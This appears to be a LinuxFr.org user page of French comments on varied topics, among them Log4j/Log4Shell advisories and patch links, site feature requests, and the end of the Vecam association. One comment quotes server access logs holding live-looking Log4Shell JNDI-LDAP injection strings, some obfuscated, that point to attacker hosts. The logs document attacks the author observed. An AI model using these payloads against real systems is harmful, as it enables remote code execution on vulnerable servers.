Benoît Sibaud a écrit 10014 commentaires

Et depuis il y a une nouvelle nouvelle version 2.17.0 https://logging.apache.org/log4j/2.x/ et https://issues.apache.org/jira/browse/LOG4J2-3230?jql=project%20%3D%20LOG4J2%20AND%20fixVersion%20%3D%202.17.0

Et depuis il y a une nouvelle nouvelle version 2.17.0 https://logging.apache.org/log4j/2.x/ et https://issues.apache.org/jira/browse/LOG4J2-3230?jql=project%20%3D%20LOG4J2%20AND%20fixVersion%20%3D%202.17.0

Si c'est la même info que le commentaire https://linuxfr.org/users/misc/liens/log4shell-rce-0-day-exploit-found-in-log4j-a-popular-java-logging-package#comment-1875994 qui date du 15 sur le lien précédent.

La discussion principale est sur https://linuxfr.org/users/misc/liens/log4shell-rce-0-day-exploit-found-in-log4j-a-popular-java-logging-package , sachant que tu avais déjà un autre lien https://linuxfr.org/users/spacefox/liens/logout4shell-corriger-la-faille-log4j-en-se-servant-de-la-faille-log4j . On voit la limite des liens : un petit côté fire and forget, soumis et oublié, par rapport à un contenu discuté dans le temps (l'info de ton lien était déjà dans les commentaires précédents).

Vu le sujet, ça reste cependant mieux d'avoir deux fois l'info que zéro.

https://twitter.com/eastdakota/status/1469800951351427073
Cloudflare: "Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure."

Et une liste de logiciels concernés ou non (pratique pour avoir les statuts) :

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

• une référence en français https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

• Debian https://www.debian.org/security/2021/dsa-5020 et https://security-tracker.debian.org/tracker/CVE-2021-44228
• Red Hat https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2021-44228
• Ubuntu https://ubuntu.com/security/CVE-2021-44228
• Suse https://www.suse.com/security/cve/CVE-2021-44228.html

• Mageia https://advisories.mageia.org/CVE-2021-44228.html
  …

• premier signalement à BlackHat 2016 https://twitter.censors.us/th3_protoCOL/status/1469644923028656130

• répondre à l'attaque par une bombe zip https://twitter.censors.us/shipilev/status/1469407591629524998

• débat sur le manque de financement / soutien aux mainteneurs de paquets largement utilisées https://twitter.censors.us/campuscodi/status/1469723936950730759 ou https://twitter.censors.us/bagder/status/1469761130503487492 ou https://twitter.censors.us/bert_hu_bert/status/1469772892980363267

• motif utilisé dans les adresses de courriel https://twitter.censors.us/lean0x2f/status/1469233245715849218

• motif utilisé dans les SSID https://twitter.censors.us/hackerfantastic/status/1469481775172829192

• attaque contre Minecraft https://twitter.censors.us/_JohnHammond/status/1469255402290401285

• attaque contre Tor https://twitter.censors.us/SwiftOnSecurity/status/1469453353822339073

Journal est utilisé ici dans le sens journal personnel, journal intime ou blog. Ils ne passent pas par la modération a priori. Et ils ne sont pas nécessairement hors-sujet (à vue de nez, la majorité est dans le thème, par contre les plus polémiques / pénibles sont hors sujets).

Attention, l'éthique et la légalité d'une telle action semblent douteuses. Voir par exemple https://twitter.censors.us/bortzmeyer/status/1469967302863040515#m

• Naissance du Facebouc du Libre
• La nouvelle licor^Wle nouveau poney à corne français
• interview IPoT : « j'ai gagné mon premier million avec un trombinoscope d'université, avant de lancer Immédiagram, OuatesApp, OccultusVR, et je ai renommé la maison mère en Profond et j'ai lancé Approfond mon monde virtuel »
• Bientôt Écoliers d'avant la déclinaison pour le marché seniors

45.155.205.<snip> - - [10/Dec/2021:14:14:08 +0100] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.<snip>:12344/Basic/Command/Base64/<snip>"
(...)
45.137.21.<snip> - - [11/Dec/2021:03:25:44 +0100] "POST / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.137.21.<snip>:1389/Basic/Command/Base64/<snip>"
(...)
20.71.156.<snip> - - [11/Dec/2021:05:51:53 +0100] "GET /$%7Bjndi:ldap://45.130.229.<snip>:1389/Exploit%7D HTTP/1.1" 301 178 "-" "Mozilla/5.0 zgrab/0.x"
(...)
45.153.160.<snip> - - [10/Dec/2021:18:59:19 +0100] "GET / HTTP/1.1" 301 162 "-" "${jndi:ldap://<snip>:39356/a}"
(...)
195.251.41.<snip> - - [11/Dec/2021:02:11:36 +0100] "GET /$%7Bjndi:ldap://45.130.229.<snip>:1389/Exploit%7D HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x"
(...)
185.220.101.<snip> - - [11/Dec/2021:12:19:35 +0100] "GET / HTTP/1.1" 301 483 "-" "${jndi:ldap://205.185.115.<snip>:47324/a}"
(...)
137.184.106.<snip> - - [11/Dec/2021:10:38:44 +0100] "GET / HTTP/1.1" 200 8587 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://<snip>:80/callback}"

Russie RU-ITRESHENIYA, Bangladesh BD-ROOTLAYER-20190805, Microsoft, Singapour/Chypre, Pays-Bas Moneroj-VPS ou NFORCE_ENTERTAINMENT, Grèce EUGENIDES-GR, États-Unis DIGITALOCEAN-167-71-0-0, Australie APNIC-ERX-146-56-0-0, Brésil DIQUA12, Allemagne Tor-Exit, Chine ALISOFT… Cet appel au voyage et à la rêverie.

Attention, l'unité SI pour les températures est le kelvin et non le Kelvin :-). (source)

et d'autres infos via https://github.com/kdeldycke/awesome-falsehood#emails

rss2email est utilisé pour la lettre quotidienne du site (qui basiquement envoie les dépêches de la veille).

Corrigé, merci.

• clic sur le '#' du commentaire : https://linuxfr.org/users/booga/journaux/comptes-de-1999-qui-etes-vous#comment-1874691

ça ne fait que positionner dans la page, donc on voit le contenu et tous les commentaires

• clic sur le titre du commentaire : https://linuxfr.org/nodes/126120/comments/1874691

on ne voit ni le contenu (même pas un lien), ni les commentaires précédents.

• clic sur répondre au commentaire : https://linuxfr.org/nodes/126120/comments/1874691/answer#new_comment

on ne voit ni le contenu (mais on a un lien Retourner au contenu associé), ni les commentaires précédents.

• clic sur éditer le commentaire (partie réservée à la modération) : https://linuxfr.org/nodes/126120/comments/1874691/modifier

on ne voit ni le contenu (même pas un lien), ni les commentaires précédents.

Je trouve aberrant qu'on ne puisse pas avoir accès à l'intégralité du contenu que l'on commente et de la discussion qui y est liée. Et ça pose des problèmes : redites, énervements, etc. Je n'arrive même pas à comprendre comment on peut, a pu penser, concocter ça et trouver ce comportement satisfaisant. Ça me gêne énormément.

pas d'entrée de suivi me semble-t-il

Je trouve aussi curieux qu'on ne puisse pas changer son fusil d'épaule et modifier une note mal attribuée.

https://linuxfr.org/suivi/annuler-un-pertinentage-inutilage

Concernant les images, le fait que, pour les dépêches, il faille passer par un service externe ne me paraît pas pertinent (et en plus c'est dangereux caar on ne peut pas les contrôler, cela peut pousser des gens à ne pas faire de dépêche et c'est contraire aux bonnes pratiques).

https://linuxfr.org/suivi/heberger-les-images-des-news-et-eventuellement-journal

Et, évidemment, il manque les boutons de signalement pour spam, et autre.

https://linuxfr.org/suivi/ajouter-un-bouton-signaler-un-truc

Corrigé, merci.

Il n'y a pas de volonté de ne pas le faire. La seule contrainte me semble être la volumétrie de courriels et les règles semi-aléatoires de certains serveurs pour accepter ou non les courriels (ie. peut-être des soucis de fiabilité et/ou un plus gros risque de classement en spammeur de notre serveur de courriel). Mais ça ne devrait pas nous décider de mettre en place de la notification par courriel (ou autre).

Annonce de Valérie Peugeot https://twitter.com/valeriepeugeot/status/1457676886482489347
« L'aventure Vecam s'achève en beauté : découvrez le compostage de 25 ans d'activités et d'engagements, revivez ce que furent quelques unes de nos utopies et retrouvez quelques unes des graines que nous avons réussi à semer ici : https://vecam.org »

Voir aussi https://www.zdnet.fr/blogs/l-esprit-libre/libre-et-open-source-express-europe-radio-april-vecam-agriculteurs-concours-acteurs-du-libre-39933379.htm
« Créée en 1995, Vecam (à l’origine, acronyme de «Veille européenne et citoyenne sur les autoroutes de l’information et le multimédia», indique Wikipédia) a mené pendant un quart de siècle un riche labeur de réflexion sur le numérique et ses enjeux de société, avec séminaires, publications, festivals. »

Rapport : « Vecam: 25 ans au service de l’internet citoyen - Anne Bellon » (Creative commons By 4.0, Vecam, novembre 2021)

Corrigé, merci.

Je ne suis pas sûr que le système d'inutilité soit vraiment mieux que le système de pertinence par contre.

En même temps intérieur ou extérieur, plus ou moins près de Paris, ce n'est pas une info directement utile non plus. Sens horaire ou anti-horaire, ça donnerait l'info plus simplement.

https://fr.wikipedia.org/wiki/Boulevard_p%C3%A9riph%C3%A9rique_de_Paris#Structure

Le périphérique intérieur est la chaussée la plus proche du centre de Paris où, du fait de la circulation à droite sur les voies françaises, les véhicules le parcourent dans le sens horaire (sens des aiguilles d'une montre). À l'inverse, le périphérique extérieur est la chaussée la plus éloignée du centre de Paris, donc la plus proche de la banlieue parisienne où la circulation s'y effectue dans le sens trigonométrique (sens inverse des aiguilles d'une montre).

Ce qui provoque un flot de "spam" sur la page d'accueil du site. Pas très attrayant…

Précision : afficher les journaux en page d'accueil est un réglage de ton compte personnel, pas celui par défaut. (cf https://linuxfr.org/compte/modifier Choisir les contenus affichés sur la page d’accueil). Ce qui ne change rien qu'on peut ne pas aimer tous les journaux.